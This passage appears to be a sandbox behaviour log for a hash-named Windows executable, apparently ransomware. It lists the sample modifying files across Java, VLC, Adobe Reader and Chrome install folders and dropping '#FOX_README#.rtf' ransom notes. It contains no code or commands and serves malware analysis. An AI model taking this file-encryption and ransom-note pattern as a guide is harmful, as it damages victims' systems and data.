f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Magadan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+1 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\DisableResize.wvx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ExportRevoke.mht f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayenne f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Omsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\resources.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ms.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\external_extensions.json f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program 